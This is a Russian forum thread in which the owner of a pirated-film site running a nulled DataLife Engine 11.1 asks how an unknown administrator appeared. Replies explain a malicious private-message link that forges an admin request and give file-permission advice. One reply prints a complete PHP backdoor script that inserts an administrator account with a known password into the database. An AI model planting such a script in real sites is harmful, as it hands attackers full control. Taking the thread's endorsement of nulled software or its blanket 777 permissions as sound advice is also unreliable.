Скрыть объявление
ВАШИ ПРАВА ОГРАНИЧЕНЫ!

Зарегистрируйтесь на форуме, чтобы стать полноценным участником сообщества!

Вопрос? Появился левый админ на сайте

Тема в разделе "Вопросы- ответы", создана пользователем roossasen, 10 фев 2018.

10.02.18 в 04:02
13.02.18 в 16:18
17
1.201
0
  1. TopicStarter Overlay
    roossasen

    roossasen Зелёный

    Регистрация:
    1 фев 2018
    Сообщения:
    14
    Лучших ответов:
    0
    Рейтинги:
    +2 / 0 / -0
    Все доброго времени суток, такая проблема возникла:
    Установил nulled версию движка DLE, вот с этого сайта брал M.I.D Team - Best Nulled Scripts версия 11.1
    На него поставил вот такой шаблон Шаблон filmax-orange dle (рипнутый)
    Начал делать выкладывать каждый день фильмы с уникальными описаниями, проделал очень много работы по поисковой оптимизации, начал закупать ссылки, разместил рекламу на ресурс для так сказать для быстрого старта. И вот сегодня обнаружил что у меня на сайте зарегистрировался ещё один администратор, посмотрел по логам, он изменял файл main, редактировал пользователей, ip его из Австрии. Его удалил, регистрацию закрыл на сайте, вот и Хотел узнать кто то сталкивался с подобным?
    Где может быть проблема в этом nulled двиге или в шаблоне?
    Что кто посоветует дальше делать?
    Если менять двиг то какой лучше ставить, лицензионный или нет, если не лицензию то откуда посоветуете скачать?
     
    #1 roossasen, 10 фев 2018
    Последнее редактирование: 10 фев 2018
  2. vasili

    vasili Бывалый

    Регистрация:
    12 июн 2016
    Сообщения:
    334
    Лучших ответов:
    0
    Рейтинги:
    +21 / 3 / -0
    у M.I.D Team с зачитой все норм да и они не ставят вирусы итд я ужы давно пользуюс их зборкой и все ок ну не знаю насчет админки но думаю что взламали ваш админку и через него создали админа переминуйте файл admin.php + не плохо бы сменить файлы dle движка .
    вед так проста зарегистрировавшись не возможно стать админом если я не ошибаюс только через главного админа можно зделать админа итд


    зачем пользоваться лицензий если сайт не приносит серьезный деньги но если сайт хорошо зарабатывает то можно и лицензию купить .
     
    #2 vasili, 10 фев 2018
    Последнее редактирование модератором: 11 фев 2018
  3. TopicStarter Overlay
    roossasen

    roossasen Зелёный

    Регистрация:
    1 фев 2018
    Сообщения:
    14
    Лучших ответов:
    0
    Рейтинги:
    +2 / 0 / -0
    дело в том что я смотрел по логам, с других ip адресов кроме меня, в мой акаунт никто не заходил
     
  4. vasili

    vasili Бывалый

    Регистрация:
    12 июн 2016
    Сообщения:
    334
    Лучших ответов:
    0
    Рейтинги:
    +21 / 3 / -0
    а не взломали ли ftp или вы не давали ли в доступ к другому человеку итд ну тут не знаю думаю как то взломали ваш админку может где то в движок вирус поставили .

    или вы сами лунатили вечером :D:D:D .
     
  5. Romantv

    Забанен

    Регистрация:
    17 июл 2015
    Сообщения:
    6.989
    Лучших ответов:
    6
    Рейтинги:
    +1.997 / 141 / -0
    Ищи похожий файл,или может web-shell
    Код:
    <?php
    define ( 'DATALIFEENGINE', true );
    define ( 'ROOT_DIR', dirname ( __FILE__ ) );
    define ( 'ENGINE_DIR', ROOT_DIR . '/engine' );
    
    require_once ENGINE_DIR . '/data/config.php';
    require_once ENGINE_DIR . '/classes/mysql.php';
    require_once ENGINE_DIR . '/data/dbconfig.php';
    if ( ! $_REQUEST['dle'] ) $dle = str_replace( '.', '', $config['version_id'] ); else $dle = $_REQUEST['dle'];
    
    function echoheader( ) {
    echo <<<HTML
    <html>
    <head>
    <title>Добовление администратора</title>
    <style type="text/css">
    html, body, td {font-family:Verdana,Tahoma;font-size:11px;}
    .finish {border:1px dashed green;padding:3px;display:block;width:50%;}
    </style>
    </head>
    <body style="text-align:center;">
    <br />
    <center>
    HTML;
    }
    function echofooter( ) {
    echo "\n</center></body>\n</html>";
    }
    
    echoheader( );
    
    $sql = array();
    
    $sql[] = "INSERT INTO `dle_users` ( `email` , `password` , `name`, `user_group` )
    VALUES ('[email protected]', '14e1b600b1fd579f47433b88e8d85291', 'Administrator007', '1');";
    
    
    foreach( $sql as $exec ) $db->query( $exec );
    
    @unlink( ENGINE_DIR . '/cache/system/usergroup.php' );
    echo '<font class="finish"><b>Администратор добавлен!!!<br>Ник: Administrator007<br>Пасс: 123456 </b><br /></font>';
    
    echofooter ( );
    ?>
     
  6. ckau

    Команда форума VIP Кинотрафик v2

    Регистрация:
    5 май 2016
    Сообщения:
    1.273
    Лучших ответов:
    4
    Рейтинги:
    +480 / 45 / -0
    Ссылку прислали в пм на сайте, скорее всего о нарушении прав и т.п., когда автор нажал на ссылку, чтоб посмотреть что внутри, то ничего не произошло, он забил.
    По факту в ссылке зашифрована инекция по добавлению нового администратора и изменению кучи настроек.
    Весной 2017 так многих ломали, типа вам пишет ркн, жалоба на фильм и ссылка сокращенная, поскольку на какой конкретно фильм не указано в пм, то все нажимали на ссылку)
     
  7. TopicStarter Overlay
    roossasen

    roossasen Зелёный

    Регистрация:
    1 фев 2018
    Сообщения:
    14
    Лучших ответов:
    0
    Рейтинги:
    +2 / 0 / -0
    да, так и было, писала какая то тётка от имени правообладателя, типо то что на сайте содержится ихний контент, и нужно его удалить, но вот странно что ссылок вообще не было никаких в сообщение, я отвечал типо что за контент попросил прислать, потом ещё несколько таких же писем от неё же приходило, и тоже без ссылки. И вот через пол часа после последнего письма смотрю у меня левый админ появился, я решил посмотреть что он будет делать дальше чтобы понять его логику, смотрю логи - он изменил файл main, и что то редактировал в профиле этот тётки - типо правообладатея, а потом он удалил самого себя. Я посмотрел что он изменил в main, заметил только появилась пустая одна строка, я её убрал, а так же удалил профиль с которого писали о нарушении прав, ну и закрыл регу временно. Что посоветуете делать дальше? как заещититься от подобного? может версию сменить двига на новую? у меня стоит щас 11.1, вроде говорят они уязвимы
     
  8. ckau

    Команда форума VIP Кинотрафик v2

    Регистрация:
    5 май 2016
    Сообщения:
    1.273
    Лучших ответов:
    4
    Рейтинги:
    +480 / 45 / -0
    просто удалить админа и все отредактированное вернуть на место, в дальнейшем никогда не открывать такие ссылки, мне раз в неделю стабильно они приходят))), год не открываю и всё впорядке)
    регистрация тут не при чем, эмулируется запрос от имени администратора на добавление пользователя такого-то с паролем таким-то с правами администратора, можете смело открывать регистрацию новым пользователям, вы сами добавили этого пользователя когда нажали на ссылку)
     
  9. TopicStarter Overlay
    roossasen

    roossasen Зелёный

    Регистрация:
    1 фев 2018
    Сообщения:
    14
    Лучших ответов:
    0
    Рейтинги:
    +2 / 0 / -0
    а там и дело в том что там даже ссылки не было, но на текст я тыкал который пришёл, возможно конечно они как то сделали так незаметно, так сказать новый способ придумали чтобы без ссылок. Может попробовать отключить редактор в ПМ. Я файл main восстановил из бекапа т.к. по логам администратора он успел только его отредактировать через админку судя по логам, а файлы остальные сайта через ftp посмотрел, вроде не заметил что что то изменялось ещё

    почитал на формах, пишут такая дыра в версиях движков до 11.3
     
    #9 roossasen, 11 фев 2018
    Последнее редактирование модератором: 11 фев 2018
  10. ckau

    Команда форума VIP Кинотрафик v2

    Регистрация:
    5 май 2016
    Сообщения:
    1.273
    Лучших ответов:
    4
    Рейтинги:
    +480 / 45 / -0
    Настройки самого сайта ещё на стандартные раньше точно сбрасывали, общие, безопастность, кеширование если были свои настройки то проверяйте
     
  11. TopicStarter Overlay
    roossasen

    roossasen Зелёный

    Регистрация:
    1 фев 2018
    Сообщения:
    14
    Лучших ответов:
    0
    Рейтинги:
    +2 / 0 / -0
    вроде как всё на месте, не успел видимо взломщик натворить делов
     
  12. byroot

    Забанен

    Регистрация:
    10 окт 2015
    Сообщения:
    12.295
    Лучших ответов:
    54
    Рейтинги:
    +5.206 / 74 / -0
    Персональное сообщение от madam.abuse
    ник может быть любой, мне уже от нескольких пользователей они приходили.
     
  13. Burial

    Burial Местный

    Регистрация:
    30 сен 2015
    Сообщения:
    1.997
    Лучших ответов:
    2
    Рейтинги:
    +464 / 80 / -0
    Проблема у тебя с правами на папки и файлы.
    Выстави все права на папки согласно инструкции 777 и 666
    engine > data > .htaccess - 444
    engine > cache > .htaccess - 444
    engine > cache > system > .htaccess - 444
    uploads > .htaccess - 444
    uploads > files > .htaccess - 444
     
    #13 Burial, 13 фев 2018
    Последнее редактирование: 13 фев 2018
  14. TopicStarter Overlay
    roossasen

    roossasen Зелёный

    Регистрация:
    1 фев 2018
    Сообщения:
    14
    Лучших ответов:
    0
    Рейтинги:
    +2 / 0 / -0
    спасибо за подсказку, выставил права 444 на файлы которые вы сказали и по инструкции DLE остальное выставил:

    1.Для начала скопируйте все файлы из папки upload в данном архиве на ваш сервер.
    2.Установите для папки templates и всем вложенным в нее папкам права на запись (CHMOD 777)
    3.Установите для всех файлов в папке templates права на запись (CHMOD 666)
    4.Установите права для записи (CHMOD 777) для папок backup, uploads, а также для всех папок, находящихся внутри них.
    5. Установите права для записи (CHMOD 777) для папок /engine/data/, /engine/cache/, /engine/cache/system/.

    информация из документации DLE: Документация по DataLife Engine
     
    • Нравится Нравится x 1
  15. Burial

    Burial Местный

    Регистрация:
    30 сен 2015
    Сообщения:
    1.997
    Лучших ответов:
    2
    Рейтинги:
    +464 / 80 / -0
    roossasen, Последние два пункта не правильно указал путь. Зациклился на engine :D Правильно так:
    uploads > .htaccess - 444
    uploads > files > .htaccess - 444
    P.S. Права 777 надо прописывать до инсталляции cms, для корректной установки движка.
     
    #15 Burial, 13 фев 2018
    Последнее редактирование: 13 фев 2018
  16. TopicStarter Overlay
    roossasen

    roossasen Зелёный

    Регистрация:
    1 фев 2018
    Сообщения:
    14
    Лучших ответов:
    0
    Рейтинги:
    +2 / 0 / -0
    то есть если уже установлен двиг то не нужно 777 ставить на папке как в инструкции указано? у меня просто 755 установлены были права, но двиг корректно установился
     
  17. Burial

    Burial Местный

    Регистрация:
    30 сен 2015
    Сообщения:
    1.997
    Лучших ответов:
    2
    Рейтинги:
    +464 / 80 / -0
    Нужно. Просто при изначальной установке может криво встать. Например не работать редактор шаблонов, не отображаются смайлы, иконки, сбиваются или не сохраняются настройки cms некоторые при попытке их сохранить, проблемы с backup восстановлением и ещё чёт там...
     
    #17 Burial, 13 фев 2018
    Последнее редактирование: 13 фев 2018
  18. TopicStarter Overlay
    roossasen

    roossasen Зелёный

    Регистрация:
    1 фев 2018
    Сообщения:
    14
    Лучших ответов:
    0
    Рейтинги:
    +2 / 0 / -0
    ну вроде всё норм, не было глюков после установки. А так всё поставил по правам как вы сказали, спасибо большое за подсказки
     
    • Нравится Нравится x 1
Похожие темы
  1. romanbkn
    Ответов:
    72
    Просмотров:
    4.623
  2. new
    Ответов:
    10
    Просмотров:
    783
  3. Edvard
    Ответов:
    10
    Просмотров:
    2.045
  4. soccerforecast
    Ответов:
    30
    Просмотров:
    3.815
Загрузка...
Яндекс.Метрика